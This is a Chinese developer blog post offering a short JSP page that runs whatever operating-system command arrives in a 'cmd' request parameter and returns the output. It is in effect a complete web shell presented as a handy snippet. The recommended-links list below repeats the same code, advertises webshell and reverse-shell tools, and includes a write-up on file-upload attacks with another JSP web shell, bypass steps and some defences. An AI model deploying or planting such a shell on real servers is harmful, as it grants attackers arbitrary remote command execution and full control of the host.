一段在JSP操作CMD的小代码

最新推荐文章于 2024-09-01 08:09:34 发布
最新推荐文章于 2024-09-01 08:09:34 发布 · 370 阅读 · 1
文章标签:

#java #runtime

在jsp或者java里面执行CMD命令的小代码.

<%@ page import="java.io.*" %>
<%
try {
	String cmd = request.getParameter("cmd");
	Process child = Runtime.getRuntime().exec(cmd);
	InputStream in = child.getInputStream();
	int c;
	while ((c = in.read()) != -1) {
		out.print((char)c);
	}
	in.close();
	try {
		child.waitFor();
	} catch (InterruptedException e) {
		e.printStackTrace();
	}
} catch (IOException e) {
	System.err.println(e);
}
%>


iteye_6233
关注
LadonGo实现菜刀连接webshell一句话执行cmd代码
K8哥哥
02-03 1472
背景 最近VPS被人D比较卡,有时候M都不定连得上,或者连上了也难代理出来,所以需要一个命令行下连接内网WEBSHELL执行命令的工具,当然这个功能Ladon早有了。主要是因为在Linux下横向渗透连接内网其它机器执行命令,GO版还没有,所以先给LadonGo添加PHP一句话的连接功能,其它webshell有空再加。 PS:其实主要是另一个原因,好像M在某个LNX环境下有问题,兼容性非常差有个BUG,NC或代理工具等可连网程序通过M执行后经常容易僵尸进程,出此意外得重启M或重启系统才行,而出现僵尸进程时又还
eclipse中使用spring boot 入门开发(包含:与jsp页面和数据库交互,cmd打包运行war包)
LUNG108的博客
05-19 4292
突然想到自己有一段时间没使用spring boot了,熟悉了一下之后决定记录一下这次使用的注意点 一:使用springBoot搭出来一个架子(从前端到数据库) 1.eclipse已经整合了maven,所以新建一个maven项目,然后针对项目修改下jdk相关点 2.目录如下:项目名为springBoot,建立的包名和类名也能看到,因为是测试,所以省略了service层 3.启动类:App...
jsp webshell cmd
10-18
jsp webshell cmd jsp 代码
jsp执行外部命令
!Java
07-19 3058
直接一个例子说明:   Runtime runtime = Runtime.getRuntime();  Process process =null;  String line=null;  InputStream is =null;  InputStreamReader isr=null;  BufferedReader br =null;  String ip="请在这里打上你要ping的ip
jsp cmd
mmllkkjj的专栏
01-14 1459
<br />http://hi.baidu.com/forhack/blog/item/9ebaf70673b95b7e02088181.html<br /> <br /><%@ page contentType="text/html; charset=gb2312"%><br /> <%@ page import="java.io.*"%><br /> <html><br /> <head><title>jspcmd功能</title><br /> </head><br /> <body bg
cmd编译可以通过执行没有结果_Jsp挖掘(6)-JSP命令执行漏洞
weixin_39885412的博客
11-24 226
JSP命令执行漏洞 一、代码执行成因调用Runtime但是没有对传入参数没有过滤和限制:jsp调用命令行的只需要在<%%> 中编写使用Runtime类即可调用命令行Windows 用“&”,linux用“;”号来分隔多条命令'cmd.exe /c type "E:jspWebGoat-5.3_RC1tomcatwebappswebgoatlesson_plansEnglishB...
cmd.jsp 经典版
Sunc23的专栏
12-03 2356
try { String cmd = request.getParameter("cmd"); Process child = Runtime.getRuntime().exec(cmd); InputStream in = child.getInputStream(); int c; while ((c = in.read()) != -1) { out.print((char)c)
jsp的webshell.txt
04-07
通过以上分析可以看出,这段代码实现了通过HTTP请求传递命令并在服务器端执行的功能,其核心是利用JavaRuntime类执行操作系统命令,并通过JSP页面将执行结果返回给客户端。需要注意的是,这种类型的WebShell存在极...
SpringBoot整合jsp示例,SpringBoot项目创建示例
12-15
这段配置指定了`jsp`页面的前缀和后缀,使得`SpringBoot`知道在哪里查找`jsp`文件。 此外,`mvnw`和`mvnw.cmd`是Maven的可执行脚本,它们用于在命令行中执行Maven命令,而`.gitignore`文件定义了在Git版本控制中应...
jsp/java执行或者调用bat/cmd脚本文件
青灬火的博客
06-15 4168
jsp页面调用脚本文件或者脚本命令的方法其实和java一样,因为可以在jsp中执行java代码 <%@ page language="java" import="java.lang.*" contentType="text/html; charset=ISO-8859-1" pageEncoding="ISO-8859-1"%> <!DOCTYPE html PUBL...
jsp命令行页面
01-16
放在同一目录下,需要导入jquery,jquery版本最低1.7
Java程序执行CMD命令代码实现
06-16
Java程序是如何执行CMD命令的,就是需要RunTime、Process类而已。 具体代码在文档中
webshell -真实可用的jsp
03-30
网上很多一句话、webshell 各种原因导致不能用,亲测可用的大马,忍痛割爱与大家分享
好用的cmdshell反弹工具
06-19
好用的cmdshell反弹工具;好用的cmdshell反弹工具
jspshell 一句话
07-24
jsp shell
cmd jsp 交互
mmllkkjj的专栏
01-14 4191
<%@page pageEncoding="gbk"%><br /> <%@page import="java.io.*"%><br /> <%!<br /> /**<br /> * Codz By ninty<br /> * http://www.forjj.com/<br /> * 2010-01-23<br /> * Windows + Tomcat 5.5 + Jdk6 + Editplus<br /> * 提供与cmd.exe的在线交互功能,只支持单个用户用,不要双开这
JSP执行DOS命令
zoeque的专栏
06-15 540
Insert title here
cmd.jsp 项目使用教程
gitblog_00967的博客
09-01 470
cmd.jsp 项目使用教程 1. 项目的目录结构及介绍 cmd.jsp 项目的目录结构如下: cmd.jsp/ ├── README.md ├── cmd.jsp └── web.xml README.md: 项目说明文件,包含项目的基本介绍和使用方法。 cmd.jsp: 项目的核心文件,用于执行远程命令。 web.xml: 项目的配置文件,定义了 servlet 和 servlet-map...
JS 和 JAVA 执行cmd命令
u010730870的博客
11-27 1045
JS 建一个html文件,写个例子: <html> <head> <meta charset = "UTF-8"> </head> <body> Input Command :<input id = "cmdValue"/></br> <button onclick = "jsExec...
jsp一句话木马 fileupload flag
最新发布
08-16
### JSP WebShell 文件上传漏洞示例 在Web安全领域,文件上传漏洞通常是指应用程序未能正确校验用户上传的文件内容,导致攻击者可以上传恶意文件(如WebShell),进而可能获得对服务器的控制权限。JSPJava Server Pages)作为Web开发的一种常见技术,同样可能受到此类漏洞的影响。 #### 文件上传漏洞的常见原因 - **文件类型校验不足**:很多Web应用通过检查文件扩展名来判断是否允许上传,但这种方式容易被绕过。例如,攻击者可能会使用`.jsp`、`.jspa`、.jsp`、`.phtml`等非标准扩展名尝试上传恶意文件。 - **文件内容未检查**:即使扩展名被正确限制,攻击者也可能通过在文件内容中嵌入恶意代码来绕过检查。例如,上传一个包含JSP代码的图片文件,利用某些服务器解析漏洞执行代码。 - **服务器配置错误**:某些情况下,服务器或中间件的错误配置也可能导致上传的文件被执行。例如,Apache服务器错误地配置了`mod_negotiation`模块,允许通过短名称访问文件,这可能被用来绕过扩展名限制[^2]。 #### JSP WebShell 示例 JSP WebShell通常是一段简短的JSP代码,能够执行命令、读取文件、上传下载等操作。下面是一个简单的JSP WebShell示例: ```jsp <%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); Process p = Runtime.getRuntime().exec(cmd); BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream())); String line; while ((line = in.readLine()) != null) { out.println(line); } %> ``` 这段代码接收一个名为`cmd`的参数,并执行该参数指定的命令,然后将输出结果返回给客户端。攻击者可以通过构造特定的请求来执行任意命令,从而控制服务器。 #### 文件上传漏洞利用方式 为了利用文件上传漏洞,攻击者通常会采取以下步骤: 1. **探测上传点**:找到Web应用中允许上传文件的地方,如用户头像上传、附件上传等。 2. **绕过校验机制**:通过修改文件扩展名、使用特殊字符、利用服务器解析漏洞等方式绕过文件类型校验。 3. **上传WebShell**:将包含恶意代码的文件上传到服务器上。 4. **触发执行**:通过访问上传的文件路径,触发WebShell的执行,从而获得对服务器的控制权限。 #### 防御措施 - **严格校验文件类型**:不仅检查文件扩展名,还应检查文件内容的真实类型,例如通过读取文件的MIME类型或Magic Number。 - **限制文件大小**:设置合理的文件大小上限,防止上传大文件消耗服务器资源。 - **隔离上传目录**:将上传的文件存储在一个独立的目录中,并确保该目录没有执行权限。 - **使用安全的文件名**:避免直接使用用户提供的文件名,而是生成随机的文件名,防止路径穿越攻击。 - **定期审计和监控**:定期检查上传目录中的文件,及时发现并处理可疑文件。 通过以上措施,可以有效减少文件上传漏洞的风险,保护Web应用免受攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值